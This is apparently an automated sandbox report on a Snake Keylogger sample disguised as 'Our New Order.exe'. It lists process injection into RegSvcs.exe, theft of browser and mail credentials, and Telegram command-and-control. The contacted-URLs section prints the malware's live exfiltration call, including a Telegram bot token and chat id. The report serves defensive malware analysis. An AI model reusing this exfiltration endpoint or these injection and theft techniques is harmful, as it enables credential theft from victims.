Source: C:\Users\user\Desktop\Our New Order.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\Our New Order.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Our New Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Our New Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000 Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000 Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 976008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Our New Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Our New Order.exe Queries volume information: C:\Users\user\Desktop\Our New Order.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3375452065.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3375452065.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3373725870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3375452065.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3375452065.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Our New Order.exe PID: 6260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6724, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000003.00000002.3375452065.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6724, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3373725870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Our New Order.exe PID: 6260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6724, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44a86e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44c9100.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3375452065.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3375452065.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3373725870.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3375452065.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3375452065.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.954465088.00000000044A8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Our New Order.exe PID: 6260, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6724, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000003.00000002.3375452065.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 6724, type: MEMORYSTR
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1650949 Sample: Our New Order.exe Startdate: 28/03/2025 Architecture: WINDOWS Score: 100 21 reallyfreegeoip.org 2->21 23 api.telegram.org 2->23 25 2 other IPs or domains 2->25 33 Suricata IDS alerts for network traffic 2->33 35 Found malware configuration 2->35 37 Malicious sample detected (through community Yara rule) 2->37 43 9 other signatures 2->43 7 Our New Order.exe 3 2->7         started        signatures3 39 Tries to detect the country of the analysis system (by using the IP) 21->39 41 Uses the Telegram API (likely for C&C communication) 23->41 process4 file5 19 C:\Users\user\...\Our New Order.exe.log, ASCII 7->19 dropped 45 Writes to foreign memory regions 7->45 47 Allocates memory in foreign processes 7->47 49 Injects a PE file into a foreign processes 7->49 11 RegSvcs.exe 15 2 7->11         started        15 RegSvcs.exe 7->15         started        17 RegSvcs.exe 7->17         started        signatures6 process7 dnsIp8 27 api.telegram.org 149.154.167.220, 443, 49698 TELEGRAMRU United Kingdom 11->27 29 checkip.dyndns.com 158.101.44.242, 49683, 49686, 49688 ORACLE-BMC-31898US United States 11->29 31 reallyfreegeoip.org 104.21.32.1, 443, 49684, 49685 CLOUDFLARENETUS United States 11->31 51 Tries to steal Mail credentials (via file / registry access) 11->51 53 Tries to harvest and steal browser information (history, passwords, etc) 11->53 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
104.21.32.1
 reallyfreegeoip.org United States
13335 CLOUDFLARENETUS false
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
reallyfreegeoip.org 104.21.32.1 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://checkip.dyndns.org/ false
    		high
    https://reallyfreegeoip.org/xml/45.92.229.138 false
      		high
      https://api.telegram.org/bot8055495510:AAGjjx2olozS_1Cl8WNZ40y4V688zWzQeEs/sendDocument?chat_id=1437092720&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake false
        		high